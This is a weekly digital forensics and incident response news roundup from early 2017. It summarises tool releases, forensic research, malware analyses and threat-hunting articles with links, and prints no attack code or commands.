Week 5 – 2017

Nominations for the 2017 Forensic 4Cast Awards are still opened! If you’d like to nominate this site for blog of the year, that would be greatly appreciated 🙂
2017 Forensic 4:cast Awards – Nominations are Open


  • Didier Stevens updated his zipdump Python script to version 0.0.5, adding the “-E option value with # to count and group.”.
    Update: zipdump.py Version 0.0.5

  • The update to Oxygen Forensic Detective (v9.1.2) was announced on Twitter last week but more information was released in a blogpost on their blog. The update improves the Export Engine and SIM card data extraction, “supports 2,700+ apps versions and 15,500+ devices”, and adds Google Chrome data parsing.
    Oxygen Forensiс Detective extracts vital information from Google Chrome!
  • Berla updated iVe to version 1.10.6. “This release adds additional support for BMW brands of vehicles and brings the supported vehicle count to over 6,000 models. It also includes the highly anticipated new Timeline features”. The supported vehicle lookup feature was also improved so that it can be updated independently of the desktop application.
    iVe v1.10 Released
  • Phil Harvey updated ExifTool to version 10.41 (development release), adding additional tags and bug fixes, as well as “an experimental metadata validation feature”.
    Feb. 1, 2017 – Version 10.41
  • A new version of MISP 2.4.63 has been released, including bug fixes and new features including “allowing fetching of full discussion threads via the API, [and] add and remove tags from objects by uuid (in addition to the id).”
    MISP 2.4.63 released
  • Elcomsoft eXplorer for WhatsApp has been updated to version 2.0, adding Android support, “In addition, Elcomsoft Explorer for WhatsApp 2.0 includes a number of bug fixes and improvements, adds support for iTunes made with the latest versions of iTunes for the latest versions of iOS up to and including 10.2, and extracts information about video calls available in the latest versions of WhatsApp”. Oleg Afonin has also written a post on how to use the tool to extract WhatsApp from Android devices.
    Elcomsoft eXplorer for WhatsApp Gets Android Support
  • Logicube released an update for their Falcon product, now at version 3.1. The update improves the imaging and hashing features, as well as various bug fixes.
    Forensic Falcon

  • X-Ways Forensics 19.1 SR-2 was released with minor improvements and bug fixes.
    X-Ways Forensics 19.1 SR-2

  • Evimetry was updated to version 2.1.5 with a couple of bug fixes and improved multi-lingual support.
    Release 2.1.5

  • GetData updated both Forensic Explorer and Mount Image Pro this week


  • John Moran at Solutionary introduces a new tool called ELMO, which “is a command line tool written in VB.NET that is intended to take the scripting functionality of a Windows batch file to the next level”. ELMO is a triage tool that allows the examiner to string multiple tools together and capture the output.
    ELMO for Incident Response


  • Jessica Hyde at Magnet Forensics will be hosting a 1 hour webinar on “new methods for discovering and parsing data from these unsupported applications”. Viewers will “learn how to test, find, parse, and script to obtain forensic evidence in new applications using a physical forensic image”. The webinar will take place 29th March 2017, 9AM (GMT-5, 2PM GMT).
    Methods for parsing new applications



  • Jim Hoerricks at Amped shows how Amped Authenticate and Amped DVRConv can be used to assist an (insurance) investigation. “Amped Authenticate provides a suite of different tools to determine whether an image is an unaltered original, an original generated by a specific device, or the result of a manipulation with a photo editing software and thus may not be accepted as evidence”. DVRConv can convert proprietary video files into a standard format.
    Insurance companies look to forensics to cut fraud and abuse – and save time

  • CyberForensicator shared a number of links this week
  • Didier Stevens has identified some information is being stored by Dropbox in Alternate Data Streams and shows how to extract it (however is unable to determine what it is).
    Quickpost: Dropbox & Alternate Data Streams

  • Vladimir Katalov at Elcomsoft explains how to jailbreak an iOS 10 device using the Yalu102 jailbreak and then perform a physical acquisition with the latest iOS Forensic Toolkit.
    iOS 10 Physical Acquisition with Yalu Jailbreak

  • Matt Bromiley continues the Zeltser challenge, however only put out one post this week. This post provides a brief overview of the $AttrDef file and then explores the attributes that are mostly used during an examination.
    A Journey into NTFS: Part 4

  • Maxim Suhanov has published a whitepaper to his GitHub examining the reliability of hardware write blockers. Maxim explains that tools such as Paladin (tested 4.01 and 6.01, current version 7.02), and various Tableau write blockers may write to drives in specific circumstances, despite being “write blocked”.
    Are hardware write blockers more reliable than software ones?

  • Dan Pullega at 4n6k shows how to “copy files directly from a Volume Shadow Copy on a live, remote machine”. In testing Dan used a Win7 VM; others have been unsuccessful when trying to replicate it on Win10.
    Forensics Quickie: Accessing & Copying Volume Shadow Copy Contents From Live Remote Systems
  • Digital Forensics Corp shared a number of articles this week
  • Will Ascenzo at Gillware Digital Forensics has a writeup of a recent case involving an unsupported mobile device. Unfortunately, the only way through the locked device was out of reach of the local police department, and the data had to be read directly from the chip. Will explains that the chip was removed, imaged and verified, and the resultant data was returned to the police to continue their investigation.
    Forensic Case Files: HTC One Mobile Chip-Off Forensics
  • Will also has posted a writeup of some recent work done by the one of their forensic data recovery specialists, Cody, where a user’s data was encrypted with the Nemucod ransomware. Cody was able to carve an unencrypted version of a file that had been encrypted, which was then used with a free decryptor tool to obtain the XOR key.
    Nemucod Data Recovery Case Study: Recovering Data from Ransomware

  • Mark McKinnon introduces an Autopsy plugin that parses Mac OSX Safari data.
    Mac OSX Safari Autopsy Plugin
  • Jonathon Poling at Ponder The Bits continues his examination of the ds_store files located in the OS X Trash folder exploring why the artefacts are recreated even if the Trash is emptied. Jonathon works through a few hypotheses however at the end still is left with a number of questions regarding why this activity occurs.
    Mac Dumpster Diving – Identifying Deleted File References in the Trash (.DS_Store) Files – Part 2
  • David Dym at Easy Meta Data has a post explaining a bug in Mac OS (OS X 10.4+) that results in the Volume Label modification date being changed. If a Volume Label is set on a FAT32 volume then the modification date will be changed to the connection date. David Cowen also mentioned this on last week’s Forensic Lunch.
    Funny Mac Behavior With Fat32 Volume Label Mod Dates

  • Stephanie Archibald at Cylance has been conducting some research “around the execution of multi-stage payloads on macOS (up to Sierra)”. Stephie shows how to locate the dynamic loader, dyld, and subsequently the executable in memory.
    Running Executables on macOS From Memory
  • The Blackbag Training Team continues their Windows Forensic Essentials Blog Series, this time looking at Volume Shadow Copies. They explain the basics of VSCs and then show how to use Blacklight to process and review data held within them.
    An Overview: Windows Volume Shadow Copies

  • The new Bluetooth Security project team has taken over the reigns from last years team, continuing the previous team’s research into BtleJuice and BlueHydra.
    Bluetooth Security Forensics
  • The Arsenal Consulting Twitter account shared a few interesting tweets on the hibernation file, and advise that they will be compiling their findings shortly. They also updated their “odatv Case Study w/ weaponized emails sent to journalist Müyesser Yıldız’s personal email”.


  • There were a few posts by the guys at Fortinet
    • Artem Semenchenko has an update on the previous work done on the Shamoon malware. Newer versions of Shamoon (also known as DistTrack) have updated the size of the picture used when overwriting files, have different compilation times, and can “now also target both physical and virtual machines” using the additional hardcoded credentials.
      Saudi Organizations Targeted by Resurfaced Shamoon Disk-Wiping Malware
    • Raul Alvarez walks through how the Petya ransomware affects the boot process.
      Ransomware And The Boot Process
    • Floser Bacurio, Joie Salvio, and Rommel Joven take a look at the “notable characteristics [of the Sage 2.0 ransomware], and provide some simple ways to mitigate it”. The malware is downloaded using either a word document or Javascript (which depending on the URL may download different types of ransomware). The malware maintains persistence with a LNK file in startup, and spawns multiple processes that watch each other to ensure they are constantly running. “It also skips any file encryption if the file “C:\\Temp\lol.txt” is found in the system” (protip, create C:\Temp\lol.txt on all your machines to avoid infection for the current versions).
      A Closer Look at Sage 2.0 Ransomware along with Wise Mitigations
  • There were a couple of articles of interest by the guys at Palo Alto Networks
  • Matt Aubert at Cisco shares the various tools and processes he uses to conduct malware analysis. He also made a YouTube video demonstrating how the various tools work to analyse a file.
    Malware Analysis for the Incident Responder

  • Mariano Graziano and Paul Rascagneres at Cisco’s Talos blog share their preliminary analysis of the EyePyramid malware. The sample is written in .NET and is heavily obfuscated, also implementing anti-sandbox and anti-debugging features. The authors were able to partially deobfuscate the malware, leading them to determine that it maintains persistence using the Run/RunOnce keys and modifies the firewall. The authors then continue to examine the malware covering the encryption used, network traffic, and exfiltration method.
    EyePyramid: An Archaeological Journey
  • The guys at IMF Security discuss “building a system to detonate Windows malware in order to evaluate the behavior and artifacts that are created”. The post covers building the system, configuring the network, setting up audit logging, capturing malware artefacts, and adding additional logging with sysmon.
    Building a Windows malware discovery lab or highly monitored system

  • Shusei Tomonaga at the Japan Computer Emergency Response Team Coordination Center “introduces techniques to deceive analysts by displaying incorrect information in the Import API, and measures to implement in PE analysis tools against the issue.” Their tool, pyimpfuzzy, “was updated with a new feature to compare INT and IAT, and only analyse the APIs that are actually imported.”
    Anti-analysis technique for PE Analysis Tools –INT Spoofing–
  • There were a couple of posts on the Microsoft Malware Protection Center Threat Research & Response Blog
    • Tommy Blizard shows how Windows Defender ATP detects the Cerber ransomware and the alerts that are generated.
      Averting ransomware epidemics in corporate networks with Windows Defender ATP
    • Duc Nguyen comments on a campaign that spreads malware using malicious LNK files in ZIP files. The latest iteration delivers more malware from more domains. “This new script has no less than five different hardcoded domains from which it attempts to download the payload malware. In addition to Locky, this script also now downloads Kovter”. “The .lnk file points to a command line containing the PowerShell script. Opening the shortcut file executes the PowerShell command”.
      Improved scripts in .lnk files now deliver Kovter in addition to Locky

  • The Malwarebytes Labs team examines the Locky Bart ransomware, which “has new features that are different from its predecessors” including faster encryption without the need for an Internet connection. The code is also protected using “WPProtect”. The authors then go on to examine the backend server application.
    Locky Bart ransomware and backend server analysis

  • Arsh Arora guest-posts on CyberCrime & Doing Time explaining that the Kelihos botnet spreads via flash media using a hidden copy of the original executable renamed to “porn.exe” as well as additional shortcut files.
    Kelihos infection spreading by Thumb Drive and continues geo-targeting
  • Didier Stevens at NVISO Labs analyses “a sample that was quarantined by GFI Cloud anti-virus”. He recommends using “the quarantine files directly for analysis, rather than restoring the quarantined file through the anti-virus management console”, and that the hash located in the accompanied XML file can be used to look up the sample on scanning services such as VirusTotal.
    Working with GFI Cloud anti-virus quarantine files
  • The guys at ThreatGeek take a look at the GoldenEye ransomware, which is an evolution of the Petya-Mischa ransomware. The malware is delivered through a maldoc and then encrypts the user’s files. The malware also installs its own bootloader, and moves and XORs the existing one.
    Spying on GoldenEye Ransomware
  • Brian Bartholomew at Securelist examines a maldoc that drops a .JS backdoor used by the Turla malware. “While the delivery method is somewhat similar to ICEDCOFFEE, the JavaScript differs greatly and appears to have been created mainly to avoid detection”. “The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the actors to run arbitrary commands via Wscript”. The malware stores itself nested in folder in local appdata, as well as temp, and maintains persistence with the Run key.
    KopiLuwak: A New JavaScript Payload from Turla

  • Winston M analyses a maldoc which generates a PowerShell script to drop an executable. This executable was then run, bypassing UAC “through manipulating eventviewer and mmc Registry”. This is a technique previously shown by Matt Nelson.
    “Newborn Macro Malware” generates PowerShell script from VBScript to drop an executable – This time with UAC Bypassing skills !!
  • Ismael Valenzuela and Marc Rivero’s post on the SANS ISC Handler Diaries also comments on a sample that uses Matt Nelsons technique for bypassing UAC. As effective as this is, the original post explains that the remediation is to remove the “current user from the Local Administrators group”
    Malicious Office files using fileless UAC bypass to drop KEYBASE malware


  • Kris Merritt at Vector8 describes the three forms of hunting as “Retrospective Discovery, Artifact Discovery, [and] Pattern Discovery”. Retrospective discovery is looking for known threats after they’ve been identified (ie in a threat feed). Artifact discovery is “discovering novel threat artifacts” by performing disk/memory/network based forensics. The third, “Pattern discovery, reveals the behavior, method, or tactic of attacker activity, not just the artifacts left behind by an attack”. Kris also provides a definitino of hunting as “the discovery of malicious artifacts, patterns, or detection methods not accounted for in passive monitoring capabilities.”.
    What on Earth is hunting anyway?

  • Josh Liburdi explains the difference between threat hunting and “detection via an automated system”. He also shares a high level overview of how he conducts a hunt.
    Threat Hunting Basics

  • Jack Crook at DFIR and Threat Hunting shares his thoughts on an article by Hayden Hainsworth at Microsoft on understanding the adversary’s toolkit. Jack explains that the author “does a good job of describing some of the tools and methods that may be employed by an attacker, but falls short when it comes to discussing how to find indications of this behavior” and then progresses to explain what “net use”, “net group” and mimikatz might look like to a defender.
    Hunting: What does it look like?
  • Seth Polley’s whitepaper was published on the SANS InfoSec Reading Room. The paper “evaluate[s] and compare[s] tools that can be used to audit Windows hosts, analyze phishing emails at depth utilizing a multifaceted approach, and search for user-initiated compromises that a security stack can fail to identify. By identifying key Indicators of Compromise (IoCs), a company can begin detecting malicious activity and begin remediation in a timely manner, often within hours of the malware first being executed”.
    Dissect the Phish to Hunt Infections


  • Samuel Alonso at Cyber-IR shared the link and a brief summary of AboutDFIR
    The DFIR compendium portal
  • Jamie McQuaid explains the various types of keyword searching available in Axiom.
    Using Keywords with Magnet AXIOM

  • Oleg Davydov, CTO of Oxygen Forensics, posted an article on Forensic Focus showing how to send AT Modem commands to temporarily remove the screen lock of an LG Android Smartphone. Oleg explains that the method is implemented in RAM and therefore doesn’t touch the ROM. The process has also been tested on a number of different LG devices (and now that it’s public will be fixed soon I’m sure).
    Unlocking The Screen of an LG Android Smartphone with AT Modem Commands
  • DFIR Guy at DFIR.Training shares his thoughts on saying “never” in DFIR. He advises that it is almost “always impossible to prove a negative without some other information outside the hard drive”. “It is easy to say “yes” when you find the artifacts in the system … but to say that something never happened is a risky path to take.”
    ‘Yes’ means ‘yes’. But ‘no’ could mean ‘maybe’ or ‘maybe not’, but ‘no’ never means ‘never’.
  • Daniel G at 43nsicbot shows “how to setup an endpoint detection lab using sysmon, windows auditing and the free version of Splunk.”
    ED without the R Lab Setup

  • Richard Kiper’s whitepaper was posted on the SANS InfoSec Reading Room. The aim of the paper was “to identify the most effective instructional design features for a future entry-level digital forensics course” and led to the “Digital Forensics Framework for Instruction Design (DFFID)”. DFFID is “a comprehensive digital forensics instructional framework meant to guide the development of future digital forensics curricula”. I like the recommendation at the end for creating intermediate or expert level courses – I’ve taken subjects at various universities on digital forensics and found that they’re generally directed at people looking to get into the field – one even used a vendor’s beginner level training package as part of the assessment.
    Forensication Education: Towards a Digital Forensics Instructional Framework
  • Lesley Carhart answers readers questions. Regarding DFIR, she advises that a physical checklist is useful in avoiding coming to conclusions because one case is similar to another. “Shortcuts and assumptions are incredibly dangerous to the legal and technical validity of investigations. Gather all the facts available to you at the time, and document every step you take so that a colleague (or a legal professional) can follow your work even far in the future”.
    Ask Lesley InfoSec Advice Column: 2017-01-30

  • The Journal of Cloud Computing is looking for papers, with a CFP closing 01 March, 2017. More information can be found here.
  • Ken Pryor recommends people head over to the 4:cast awards nomination site!
    2017 Forensic 4:cast Awards Nominations are Open!

And that’s all for Week 5! If you think I’ve missed something, or want me to cover something specifically hit me up through the contact page or on the social pipes!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s